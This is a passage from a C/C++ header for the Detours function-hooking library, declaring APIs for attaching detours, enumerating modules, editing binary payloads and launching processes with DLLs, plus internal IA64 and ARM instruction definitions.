PVOID *ppPointer, 567 | _In_ PVOID pDetour); 568 | 569 | LONG WINAPI DetourAttachEx(_Inout_ PVOID *ppPointer, 570 | _In_ PVOID pDetour, 571 | _Out_opt_ PDETOUR_TRAMPOLINE *ppRealTrampoline, 572 | _Out_opt_ PVOID *ppRealTarget, 573 | _Out_opt_ PVOID *ppRealDetour); 574 | 575 | LONG WINAPI DetourDetach(_Inout_ PVOID *ppPointer, 576 | _In_ PVOID pDetour); 577 | 578 | BOOL WINAPI DetourSetIgnoreTooSmall(_In_ BOOL fIgnore); 579 | BOOL WINAPI DetourSetRetainRegions(_In_ BOOL fRetain); 580 | PVOID WINAPI DetourSetSystemRegionLowerBound(_In_ PVOID pSystemRegionLowerBound); 581 | PVOID WINAPI DetourSetSystemRegionUpperBound(_In_ PVOID pSystemRegionUpperBound); 582 | 583 | ////////////////////////////////////////////////////////////// Code Functions. 584 | // 585 | PVOID WINAPI DetourFindFunction(_In_ LPCSTR pszModule, 586 | _In_ LPCSTR pszFunction); 587 | PVOID WINAPI DetourCodeFromPointer(_In_ PVOID pPointer, 588 | _Out_opt_ PVOID *ppGlobals); 589 | PVOID WINAPI DetourCopyInstruction(_In_opt_ PVOID pDst, 590 | _Inout_opt_ PVOID *ppDstPool, 591 | _In_ PVOID pSrc, 592 | _Out_opt_ PVOID *ppTarget, 593 | _Out_opt_ LONG *plExtra); 594 | BOOL WINAPI DetourSetCodeModule(_In_ HMODULE hModule, 595 | _In_ BOOL fLimitReferencesToModule); 596 | PVOID WINAPI DetourAllocateRegionWithinJumpBounds(_In_ LPCVOID pbTarget, 597 | _Out_ PDWORD pcbAllocatedSize); 598 | BOOL WINAPI DetourIsFunctionImported(_In_ PBYTE pbCode, 599 | _In_ PBYTE pbAddress); 600 | 601 | ///////////////////////////////////////////////////// Loaded Binary Functions. 602 | // 603 | HMODULE WINAPI DetourGetContainingModule(_In_ PVOID pvAddr); 604 | HMODULE WINAPI DetourEnumerateModules(_In_opt_ HMODULE hModuleLast); 605 | PVOID WINAPI DetourGetEntryPoint(_In_opt_ HMODULE hModule); 606 | ULONG WINAPI DetourGetModuleSize(_In_opt_ HMODULE hModule); 607 | BOOL WINAPI DetourEnumerateExports(_In_ HMODULE hModule, 608 | _In_opt_ PVOID pContext, 609 | _In_ PF_DETOUR_ENUMERATE_EXPORT_CALLBACK pfExport); 610 | BOOL WINAPI DetourEnumerateImports(_In_opt_ HMODULE hModule, 611 | _In_opt_ PVOID pContext, 612 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 613 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc); 614 | 615 | BOOL WINAPI DetourEnumerateImportsEx(_In_opt_ HMODULE hModule, 616 | _In_opt_ PVOID pContext, 617 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 618 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK_EX pfImportFuncEx); 619 | 620 | _Writable_bytes_(*pcbData) 621 | _Readable_bytes_(*pcbData) 622 | _Success_(return != NULL) 623 | PVOID WINAPI DetourFindPayload(_In_opt_ HMODULE hModule, 624 | _In_ REFGUID rguid, 625 | _Out_opt_ DWORD *pcbData); 626 | 627 | _Writable_bytes_(*pcbData) 628 | _Readable_bytes_(*pcbData) 629 | _Success_(return != NULL) 630 | PVOID WINAPI DetourFindPayloadEx(_In_ REFGUID rguid, 631 | _Out_opt_ DWORD *pcbData); 632 | 633 | DWORD WINAPI DetourGetSizeOfPayloads(_In_opt_ HMODULE hModule); 634 | 635 | BOOL WINAPI DetourFreePayload(_In_ PVOID pvData); 636 | ///////////////////////////////////////////////// Persistent Binary Functions. 637 | // 638 | 639 | PDETOUR_BINARY WINAPI DetourBinaryOpen(_In_ HANDLE hFile); 640 | 641 | _Writable_bytes_(*pcbData) 642 | _Readable_bytes_(*pcbData) 643 | _Success_(return != NULL) 644 | PVOID WINAPI DetourBinaryEnumeratePayloads(_In_ PDETOUR_BINARY pBinary, 645 | _Out_opt_ GUID *pGuid, 646 | _Out_ DWORD *pcbData, 647 | _Inout_ DWORD *pnIterator); 648 | 649 | _Writable_bytes_(*pcbData) 650 | _Readable_bytes_(*pcbData) 651 | _Success_(return != NULL) 652 | PVOID WINAPI DetourBinaryFindPayload(_In_ PDETOUR_BINARY pBinary, 653 | _In_ REFGUID rguid, 654 | _Out_ DWORD *pcbData); 655 | 656 | PVOID WINAPI DetourBinarySetPayload(_In_ PDETOUR_BINARY pBinary, 657 | _In_ REFGUID rguid, 658 | _In_reads_opt_(cbData) PVOID pData, 659 | _In_ DWORD cbData); 660 | BOOL WINAPI DetourBinaryDeletePayload(_In_ PDETOUR_BINARY pBinary, _In_ REFGUID rguid); 661 | BOOL WINAPI DetourBinaryPurgePayloads(_In_ PDETOUR_BINARY pBinary); 662 | BOOL WINAPI DetourBinaryResetImports(_In_ PDETOUR_BINARY pBinary); 663 | BOOL WINAPI DetourBinaryEditImports(_In_ PDETOUR_BINARY pBinary, 664 | _In_opt_ PVOID pContext, 665 | _In_opt_ PF_DETOUR_BINARY_BYWAY_CALLBACK pfByway, 666 | _In_opt_ PF_DETOUR_BINARY_FILE_CALLBACK pfFile, 667 | _In_opt_ PF_DETOUR_BINARY_SYMBOL_CALLBACK pfSymbol, 668 | _In_opt_ PF_DETOUR_BINARY_COMMIT_CALLBACK pfCommit); 669 | BOOL WINAPI DetourBinaryWrite(_In_ PDETOUR_BINARY pBinary, _In_ HANDLE hFile); 670 | BOOL WINAPI DetourBinaryClose(_In_ PDETOUR_BINARY pBinary); 671 | 672 | /////////////////////////////////////////////////// Create Process & Load Dll. 673 | // 674 | _Success_(return != NULL) 675 | PVOID WINAPI DetourFindRemotePayload(_In_ HANDLE hProcess, 676 | _In_ REFGUID rguid, 677 | _Out_opt_ DWORD *pcbData); 678 | 679 | typedef BOOL (WINAPI *PDETOUR_CREATE_PROCESS_ROUTINEA)( 680 | _In_opt_ LPCSTR lpApplicationName, 681 | _Inout_opt_ LPSTR lpCommandLine, 682 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 683 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 684 | _In_ BOOL bInheritHandles, 685 | _In_ DWORD dwCreationFlags, 686 | _In_opt_ LPVOID lpEnvironment, 687 | _In_opt_ LPCSTR lpCurrentDirectory, 688 | _In_ LPSTARTUPINFOA lpStartupInfo, 689 | _Out_ LPPROCESS_INFORMATION lpProcessInformation); 690 | 691 | typedef BOOL (WINAPI *PDETOUR_CREATE_PROCESS_ROUTINEW)( 692 | _In_opt_ LPCWSTR lpApplicationName, 693 | _Inout_opt_ LPWSTR lpCommandLine, 694 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 695 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 696 | _In_ BOOL bInheritHandles, 697 | _In_ DWORD dwCreationFlags, 698 | _In_opt_ LPVOID lpEnvironment, 699 | _In_opt_ LPCWSTR lpCurrentDirectory, 700 | _In_ LPSTARTUPINFOW lpStartupInfo, 701 | _Out_ LPPROCESS_INFORMATION lpProcessInformation); 702 | 703 | BOOL WINAPI DetourCreateProcessWithDllA(_In_opt_ LPCSTR lpApplicationName, 704 | _Inout_opt_ LPSTR lpCommandLine, 705 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 706 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 707 | _In_ BOOL bInheritHandles, 708 | _In_ DWORD dwCreationFlags, 709 | _In_opt_ LPVOID lpEnvironment, 710 | _In_opt_ LPCSTR lpCurrentDirectory, 711 | _In_ LPSTARTUPINFOA lpStartupInfo, 712 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 713 | _In_ LPCSTR lpDllName, 714 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 715 | 716 | BOOL WINAPI DetourCreateProcessWithDllW(_In_opt_ LPCWSTR lpApplicationName, 717 | _Inout_opt_ LPWSTR lpCommandLine, 718 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 719 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 720 | _In_ BOOL bInheritHandles, 721 | _In_ DWORD dwCreationFlags, 722 | _In_opt_ LPVOID lpEnvironment, 723 | _In_opt_ LPCWSTR lpCurrentDirectory, 724 | _In_ LPSTARTUPINFOW lpStartupInfo, 725 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 726 | _In_ LPCSTR lpDllName, 727 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 728 | 729 | #ifdef UNICODE 730 | #define DetourCreateProcessWithDll DetourCreateProcessWithDllW 731 | #define PDETOUR_CREATE_PROCESS_ROUTINE PDETOUR_CREATE_PROCESS_ROUTINEW 732 | #else 733 | #define DetourCreateProcessWithDll DetourCreateProcessWithDllA 734 | #define PDETOUR_CREATE_PROCESS_ROUTINE PDETOUR_CREATE_PROCESS_ROUTINEA 735 | #endif // !UNICODE 736 | 737 | BOOL WINAPI DetourCreateProcessWithDllExA(_In_opt_ LPCSTR lpApplicationName, 738 | _Inout_opt_ LPSTR lpCommandLine, 739 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 740 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 741 | _In_ BOOL bInheritHandles, 742 | _In_ DWORD dwCreationFlags, 743 | _In_opt_ LPVOID lpEnvironment, 744 | _In_opt_ LPCSTR lpCurrentDirectory, 745 | _In_ LPSTARTUPINFOA lpStartupInfo, 746 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 747 | _In_ LPCSTR lpDllName, 748 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 749 | 750 | BOOL WINAPI DetourCreateProcessWithDllExW(_In_opt_ LPCWSTR lpApplicationName, 751 | _Inout_opt_ LPWSTR lpCommandLine, 752 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 753 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 754 | _In_ BOOL bInheritHandles, 755 | _In_ DWORD dwCreationFlags, 756 | _In_opt_ LPVOID lpEnvironment, 757 | _In_opt_ LPCWSTR lpCurrentDirectory, 758 | _In_ LPSTARTUPINFOW lpStartupInfo, 759 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 760 | _In_ LPCSTR lpDllName, 761 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 762 | 763 | #ifdef UNICODE 764 | #define DetourCreateProcessWithDllEx DetourCreateProcessWithDllExW 765 | #else 766 | #define DetourCreateProcessWithDllEx DetourCreateProcessWithDllExA 767 | #endif // !UNICODE 768 | 769 | BOOL WINAPI DetourCreateProcessWithDllsA(_In_opt_ LPCSTR lpApplicationName, 770 | _Inout_opt_ LPSTR lpCommandLine, 771 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 772 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 773 | _In_ BOOL bInheritHandles, 774 | _In_ DWORD dwCreationFlags, 775 | _In_opt_ LPVOID lpEnvironment, 776 | _In_opt_ LPCSTR lpCurrentDirectory, 777 | _In_ LPSTARTUPINFOA lpStartupInfo, 778 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 779 | _In_ DWORD nDlls, 780 | _In_reads_(nDlls) LPCSTR *rlpDlls, 781 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 782 | 783 | BOOL WINAPI DetourCreateProcessWithDllsW(_In_opt_ LPCWSTR lpApplicationName, 784 | _Inout_opt_ LPWSTR lpCommandLine, 785 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 786 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 787 | _In_ BOOL bInheritHandles, 788 | _In_ DWORD dwCreationFlags, 789 | _In_opt_ LPVOID lpEnvironment, 790 | _In_opt_ LPCWSTR lpCurrentDirectory, 791 | _In_ LPSTARTUPINFOW lpStartupInfo, 792 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 793 | _In_ DWORD nDlls, 794 | _In_reads_(nDlls) LPCSTR *rlpDlls, 795 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 796 | 797 | #ifdef UNICODE 798 | #define DetourCreateProcessWithDlls DetourCreateProcessWithDllsW 799 | #else 800 | #define DetourCreateProcessWithDlls DetourCreateProcessWithDllsA 801 | #endif // !UNICODE 802 | 803 | BOOL WINAPI DetourProcessViaHelperA(_In_ DWORD dwTargetPid, 804 | _In_ LPCSTR lpDllName, 805 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 806 | 807 | BOOL WINAPI DetourProcessViaHelperW(_In_ DWORD dwTargetPid, 808 | _In_ LPCSTR lpDllName, 809 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 810 | 811 | #ifdef UNICODE 812 | #define DetourProcessViaHelper DetourProcessViaHelperW 813 | #else 814 | #define DetourProcessViaHelper DetourProcessViaHelperA 815 | #endif // !UNICODE 816 | 817 | BOOL WINAPI DetourProcessViaHelperDllsA(_In_ DWORD dwTargetPid, 818 | _In_ DWORD nDlls, 819 | _In_reads_(nDlls) LPCSTR *rlpDlls, 820 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 821 | 822 | BOOL WINAPI DetourProcessViaHelperDllsW(_In_ DWORD dwTargetPid, 823 | _In_ DWORD nDlls, 824 | _In_reads_(nDlls) LPCSTR *rlpDlls, 825 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 826 | 827 | #ifdef UNICODE 828 | #define DetourProcessViaHelperDlls DetourProcessViaHelperDllsW 829 | #else 830 | #define DetourProcessViaHelperDlls DetourProcessViaHelperDllsA 831 | #endif // !UNICODE 832 | 833 | BOOL WINAPI DetourUpdateProcessWithDll(_In_ HANDLE hProcess, 834 | _In_reads_(nDlls) LPCSTR *rlpDlls, 835 | _In_ DWORD nDlls); 836 | 837 | BOOL WINAPI DetourUpdateProcessWithDllEx(_In_ HANDLE hProcess, 838 | _In_ HMODULE hImage, 839 | _In_ BOOL bIs32Bit, 840 | _In_reads_(nDlls) LPCSTR *rlpDlls, 841 | _In_ DWORD nDlls); 842 | 843 | BOOL WINAPI DetourCopyPayloadToProcess(_In_ HANDLE hProcess, 844 | _In_ REFGUID rguid, 845 | _In_reads_bytes_(cbData) LPCVOID pvData, 846 | _In_ DWORD cbData); 847 | _Success_(return != NULL) 848 | PVOID WINAPI DetourCopyPayloadToProcessEx(_In_ HANDLE hProcess, 849 | _In_ REFGUID rguid, 850 | _In_reads_bytes_(cbData) LPCVOID pvData, 851 | _In_ DWORD cbData); 852 | 853 | BOOL WINAPI DetourRestoreAfterWith(VOID); 854 | BOOL WINAPI DetourRestoreAfterWithEx(_In_reads_bytes_(cbData) PVOID pvData, 855 | _In_ DWORD cbData); 856 | BOOL WINAPI DetourIsHelperProcess(VOID); 857 | VOID CALLBACK DetourFinishHelperProcess(_In_ HWND, 858 | _In_ HINSTANCE, 859 | _In_ LPSTR, 860 | _In_ INT); 861 | 862 | // 863 | ////////////////////////////////////////////////////////////////////////////// 864 | #ifdef __cplusplus 865 | } 866 | #endif // __cplusplus 867 | 868 | /////////////////////////////////////////////////// Type-safe overloads for C++ 869 | // 870 | #if __cplusplus >= 201103L || _MSVC_LANG >= 201103L 871 | #include 872 | 873 | template 874 | struct DetoursIsFunctionPointer : std::false_type {}; 875 | 876 | template 877 | struct DetoursIsFunctionPointer : std::is_function::type> {}; 878 | 879 | template< 880 | typename T, 881 | typename std::enable_if::value, int>::type = 0> 882 | LONG DetourAttach(_Inout_ T *ppPointer, 883 | _In_ T pDetour) noexcept 884 | { 885 | return DetourAttach( 886 | reinterpret_cast(ppPointer), 887 | reinterpret_cast(pDetour)); 888 | } 889 | 890 | template< 891 | typename T, 892 | typename std::enable_if::value, int>::type = 0> 893 | LONG DetourAttachEx(_Inout_ T *ppPointer, 894 | _In_ T pDetour, 895 | _Out_opt_ PDETOUR_TRAMPOLINE *ppRealTrampoline, 896 | _Out_opt_ T *ppRealTarget, 897 | _Out_opt_ T *ppRealDetour) noexcept 898 | { 899 | return DetourAttachEx( 900 | reinterpret_cast(ppPointer), 901 | reinterpret_cast(pDetour), 902 | ppRealTrampoline, 903 | reinterpret_cast(ppRealTarget), 904 | reinterpret_cast(ppRealDetour)); 905 | } 906 | 907 | template< 908 | typename T, 909 | typename std::enable_if::value, int>::type = 0> 910 | LONG DetourDetach(_Inout_ T *ppPointer, 911 | _In_ T pDetour) noexcept 912 | { 913 | return DetourDetach( 914 | reinterpret_cast(ppPointer), 915 | reinterpret_cast(pDetour)); 916 | } 917 | 918 | #endif // __cplusplus >= 201103L || _MSVC_LANG >= 201103L 919 | // 920 | ////////////////////////////////////////////////////////////////////////////// 921 | 922 | //////////////////////////////////////////////// Detours Internal Definitions. 923 | // 924 | #ifdef __cplusplus 925 | #ifdef DETOURS_INTERNAL 926 | 927 | #define NOTHROW 928 | // #define NOTHROW (nothrow) 929 | 930 | ////////////////////////////////////////////////////////////////////////////// 931 | // 932 | #if (_MSC_VER < 1299) && !defined(__GNUC__) 933 | #include 934 | typedef IMAGEHLP_MODULE IMAGEHLP_MODULE64; 935 | typedef PIMAGEHLP_MODULE PIMAGEHLP_MODULE64; 936 | typedef IMAGEHLP_SYMBOL SYMBOL_INFO; 937 | typedef PIMAGEHLP_SYMBOL PSYMBOL_INFO; 938 | 939 | static inline 940 | LONG InterlockedCompareExchange(_Inout_ LONG *ptr, _In_ LONG nval, _In_ LONG oval) 941 | { 942 | return (LONG)::InterlockedCompareExchange((PVOID*)ptr, (PVOID)nval, (PVOID)oval); 943 | } 944 | #else 945 | #pragma warning(push) 946 | #pragma warning(disable:4091) // empty typedef 947 | #include 948 | #pragma warning(pop) 949 | #endif 950 | 951 | #ifdef IMAGEAPI // defined by DBGHELP.H 952 | typedef LPAPI_VERSION (NTAPI *PF_ImagehlpApiVersionEx)(_In_ LPAPI_VERSION AppVersion); 953 | 954 | typedef BOOL (NTAPI *PF_SymInitialize)(_In_ HANDLE hProcess, 955 | _In_opt_ LPCSTR UserSearchPath, 956 | _In_ BOOL fInvadeProcess); 957 | typedef DWORD (NTAPI *PF_SymSetOptions)(_In_ DWORD SymOptions); 958 | typedef DWORD (NTAPI *PF_SymGetOptions)(VOID); 959 | typedef DWORD64 (NTAPI *PF_SymLoadModule64)(_In_ HANDLE hProcess, 960 | _In_opt_ HANDLE hFile, 961 | _In_opt_ LPSTR ImageName, 962 | _In_opt_ LPSTR ModuleName, 963 | _In_ DWORD64 BaseOfDll, 964 | _In_ DWORD SizeOfDll); 965 | typedef BOOL (NTAPI *PF_SymGetModuleInfo64)(_In_ HANDLE hProcess, 966 | _In_ DWORD64 qwAddr, 967 | _Out_ PIMAGEHLP_MODULE64 ModuleInfo); 968 | typedef BOOL (NTAPI *PF_SymFromName)(_In_ HANDLE hProcess, 969 | _In_ LPSTR Name, 970 | _Out_ PSYMBOL_INFO Symbol); 971 | 972 | typedef struct _DETOUR_SYM_INFO 973 | { 974 | HANDLE hProcess; 975 | HMODULE hDbgHelp; 976 | PF_ImagehlpApiVersionEx pfImagehlpApiVersionEx; 977 | PF_SymInitialize pfSymInitialize; 978 | PF_SymSetOptions pfSymSetOptions; 979 | PF_SymGetOptions pfSymGetOptions; 980 | PF_SymLoadModule64 pfSymLoadModule64; 981 | PF_SymGetModuleInfo64 pfSymGetModuleInfo64; 982 | PF_SymFromName pfSymFromName; 983 | } DETOUR_SYM_INFO, *PDETOUR_SYM_INFO; 984 | 985 | PDETOUR_SYM_INFO DetourLoadImageHlp(VOID); 986 | 987 | #endif // IMAGEAPI 988 | 989 | #if defined(_INC_STDIO) && !defined(_CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS) 990 | #error detours.h must be included before stdio.h (or at least define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS earlier) 991 | #endif 992 | #define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1 993 | 994 | #ifdef _DEBUG 995 | 996 | int Detour_AssertExprWithFunctionName(int reportType, const char* filename, int linenumber, const char* FunctionName, const char* msg); 997 | 998 | #define DETOUR_ASSERT_EXPR_WITH_FUNCTION(expr, msg) \ 999 | (void) ((expr) || \ 1000 | (1 != Detour_AssertExprWithFunctionName(_CRT_ASSERT, __FILE__, __LINE__,__FUNCTION__, msg)) || \ 1001 | (_CrtDbgBreak(), 0)) 1002 | 1003 | #define DETOUR_ASSERT(expr) DETOUR_ASSERT_EXPR_WITH_FUNCTION((expr), #expr) 1004 | 1005 | #else// _DEBUG 1006 | #define DETOUR_ASSERT(expr) 1007 | #endif// _DEBUG 1008 | 1009 | #ifndef DETOUR_TRACE 1010 | #if DETOUR_DEBUG 1011 | #define DETOUR_TRACE(x) printf x 1012 | #define DETOUR_BREAK() __debugbreak() 1013 | #include 1014 | #include 1015 | #else 1016 | #define DETOUR_TRACE(x) 1017 | #define DETOUR_BREAK() 1018 | #endif 1019 | #endif 1020 | 1021 | #if 1 || defined(DETOURS_IA64) 1022 | 1023 | // 1024 | // IA64 instructions are 41 bits, 3 per bundle, plus 5 bit bundle template => 128 bits per bundle. 1025 | // 1026 | 1027 | #define DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE (3) 1028 | 1029 | #define DETOUR_IA64_TEMPLATE_OFFSET (0) 1030 | #define DETOUR_IA64_TEMPLATE_SIZE (5) 1031 | 1032 | #define DETOUR_IA64_INSTRUCTION_SIZE (41) 1033 | #define DETOUR_IA64_INSTRUCTION0_OFFSET (DETOUR_IA64_TEMPLATE_SIZE) 1034 | #define DETOUR_IA64_INSTRUCTION1_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE) 1035 | #define DETOUR_IA64_INSTRUCTION2_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE + DETOUR_IA64_INSTRUCTION_SIZE) 1036 | 1037 | C_ASSERT(DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE * DETOUR_IA64_INSTRUCTION_SIZE == 128); 1038 | 1039 | __declspec(align(16)) struct DETOUR_IA64_BUNDLE 1040 | { 1041 | public: 1042 | union 1043 | { 1044 | BYTE data[16]; 1045 | UINT64 wide[2]; 1046 | }; 1047 | 1048 | enum { 1049 | A_UNIT = 1u, 1050 | I_UNIT = 2u, 1051 | M_UNIT = 3u, 1052 | B_UNIT = 4u, 1053 | F_UNIT = 5u, 1054 | L_UNIT = 6u, 1055 | X_UNIT = 7u, 1056 | }; 1057 | struct DETOUR_IA64_METADATA 1058 | { 1059 | ULONG nTemplate : 8; // Instruction template. 1060 | ULONG nUnit0 : 4; // Unit for slot 0 1061 | ULONG nUnit1 : 4; // Unit for slot 1 1062 | ULONG nUnit2 : 4; // Unit for slot 2 1063 | }; 1064 | 1065 | protected: 1066 | static const DETOUR_IA64_METADATA s_rceCopyTable[33]; 1067 | 1068 | UINT RelocateBundle(_Inout_ DETOUR_IA64_BUNDLE* pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const; 1069 | 1070 | bool RelocateInstruction(_Inout_ DETOUR_IA64_BUNDLE* pDst, 1071 | _In_ BYTE slot, 1072 | _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const; 1073 | 1074 | // 120 112 104 96 88 80 72 64 56 48 40 32 24 16 8 0 1075 | // f. e. d. c. b. a. 9. 8. 7. 6. 5. 4. 3. 2. 1. 0. 1076 | 1077 | // 00 1078 | // f.e. d.c. b.a. 9.8. 7.6. 5.4. 3.2. 1.0. 1079 | // 0000 0000 0000 0000 0000 0000 0000 001f : Template [4..0] 1080 | // 0000 0000 0000 0000 0000 03ff ffff ffe0 : Zero [ 41.. 5] 1081 | // 0000 0000 0000 0000 0000 3c00 0000 0000 : Zero [ 45.. 42] 1082 | // 0000 0000 0007 ffff ffff c000 0000 0000 : One [ 82.. 46] 1083 | // 0000 0000 0078 0000 0000 0000 0000 0000 : One [ 86.. 83] 1084 | // 0fff ffff ff80 0000 0000 0000 0000 0000 : Two [123.. 87] 1085 | // f000 0000 0000 0000 0000 0000 0000 0000 : Two [127..124] 1086 | BYTE GetTemplate() const; 1087 | // Get 4 bit opcodes. 1088 | BYTE GetInst0() const; 1089 | BYTE GetInst1() const; 1090 | BYTE GetInst2() const; 1091 | BYTE GetUnit(BYTE slot) const; 1092 | BYTE GetUnit0() const; 1093 | BYTE GetUnit1() const; 1094 | BYTE GetUnit2() const; 1095 | // Get 37 bit data. 1096 | UINT64 GetData0() const; 1097 | UINT64 GetData1() const; 1098 | UINT64 GetData2() const; 1099 | 1100 | // Get/set the full 41 bit instructions. 1101 | UINT64 GetInstruction(BYTE slot) const; 1102 | UINT64 GetInstruction0() const; 1103 | UINT64 GetInstruction1() const; 1104 | UINT64 GetInstruction2() const; 1105 | void SetInstruction(BYTE slot, UINT64 instruction); 1106 | void SetInstruction0(UINT64 instruction); 1107 | void SetInstruction1(UINT64 instruction); 1108 | void SetInstruction2(UINT64 instruction); 1109 | 1110 | // Get/set bitfields. 1111 | static UINT64 GetBits(UINT64 Value, UINT64 Offset, UINT64 Count); 1112 | static UINT64 SetBits(UINT64 Value, UINT64 Offset, UINT64 Count, UINT64 Field); 1113 | 1114 | // Get specific read-only fields. 1115 | static UINT64 GetOpcode(UINT64 instruction); // 4bit opcode 1116 | static UINT64 GetX(UINT64 instruction); // 1bit opcode extension 1117 | static UINT64 GetX3(UINT64 instruction); // 3bit opcode extension 1118 | static UINT64 GetX6(UINT64 instruction); // 6bit opcode extension 1119 | 1120 | // Get/set specific fields. 1121 | static UINT64 GetImm7a(UINT64 instruction); 1122 | static UINT64 SetImm7a(UINT64 instruction, UINT64 imm7a); 1123 | static UINT64 GetImm13c(UINT64 instruction); 1124 | static UINT64 SetImm13c(UINT64 instruction, UINT64 imm13c); 1125 | static UINT64 GetSignBit(UINT64 instruction); 1126 | static UINT64 SetSignBit(UINT64 instruction, UINT64 signBit); 1127 | static UINT64 GetImm20a(UINT64 instruction); 1128 | static UINT64 SetImm20a(UINT64 instruction, UINT64 imm20a); 1129 | static UINT64 GetImm20b(UINT64 instruction); 1130 | static UINT64 SetImm20b(UINT64 instruction, UINT64 imm20b); 1131 | 1132 | static UINT64 SignExtend(UINT64 Value, UINT64 Offset); 1133 | 1134 | BOOL IsMovlGp() const; 1135 | 1136 | VOID SetInst(BYTE Slot, BYTE nInst); 1137 | VOID SetInst0(BYTE nInst); 1138 | VOID SetInst1(BYTE nInst); 1139 | VOID SetInst2(BYTE nInst); 1140 | VOID SetData(BYTE Slot, UINT64 nData); 1141 | VOID SetData0(UINT64 nData); 1142 | VOID SetData1(UINT64 nData); 1143 | VOID SetData2(UINT64 nData); 1144 | BOOL SetNop(BYTE Slot); 1145 | BOOL SetNop0(); 1146 | BOOL SetNop1(); 1147 | BOOL SetNop2(); 1148 | 1149 | public: 1150 | BOOL IsBrl() const; 1151 | VOID SetBrl(); 1152 | VOID SetBrl(UINT64 target); 1153 | UINT64 GetBrlTarget() const; 1154 | VOID SetBrlTarget(UINT64 target); 1155 | VOID SetBrlImm(UINT64 imm); 1156 | UINT64 GetBrlImm() const; 1157 | 1158 | UINT64 GetMovlGp() const; 1159 | VOID SetMovlGp(UINT64 gp); 1160 | 1161 | VOID SetStop(); 1162 | 1163 | UINT Copy(_Out_ DETOUR_IA64_BUNDLE *pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra = NULL) const; 1164 | }; 1165 | #endif // DETOURS_IA64 1166 | 1167 | #ifdef DETOURS_ARM 1168 | 1169 | #define DETOURS_PFUNC_TO_PBYTE(p) ((PBYTE)(((ULONG_PTR)(p)) & ~(ULONG_PTR)1)) 1170 | #define DETOURS_PBYTE_TO_PFUNC(p) ((PBYTE)(((ULONG_PTR)(p)) | (ULONG_PTR)1)) 1171 | 1172 | #endif // DETOURS_ARM 1173 | 1174 | ////////////////////////////////////////////////////////////////////////////// 1175 | 1176 | #ifdef __cplusplus 1177 | extern "C" { 1178 | #endif // __cplusplus 1179 | 1180 | #define DETOUR_OFFLINE_LIBRARY(x) \ 1181 | PVOID WINAPI DetourCopyInstruction##x(_In_opt_ PVOID pDst, \ 1182 | _Inout_opt_ PVOID *ppDstPool, \ 1183 | _In_ PVOID pSrc, \ 1184 | _Out_opt_ PVOID *ppTarget, \ 1185 | _Out_opt_ LONG *plExtra); \ 1186 | \ 1187 | BOOL WINAPI DetourSetCodeModule##x(_In_ HMODULE hModule, \ 1188 | _In_ BOOL fLimitReferencesToModule); \ 1189 | 1190 | DETOUR_OFFLINE_LIBRARY(X86) 1191 | DETOUR_OFFLINE_LIBRARY(X64) 1192 | DETOUR_OFFLINE_LIBRARY(ARM) 1193 | DETOUR_OFFLINE_LIBRARY(ARM64) 1194 | DETOUR_OFFLINE_LIBRARY(IA64) 1195 | 1196 | #undef DETOUR_OFFLINE_LIBRARY 1197 | 1198 | ////////////////////////////////////////////////////////////////////////////// 1199 | // 1200 | // Helpers for manipulating page protection. 1201 | // 1202 | 1203 | _Success_(return != FALSE) 1204 | BOOL WINAPI DetourVirtualProtectSameExecuteEx(_In_ HANDLE hProcess, 1205 | _In_ PVOID pAddress, 1206 | _In_ SIZE_T nSize, 1207 | _In_ DWORD dwNewProtect, 1208 | _Out_ PDWORD pdwOldProtect); 1209 | 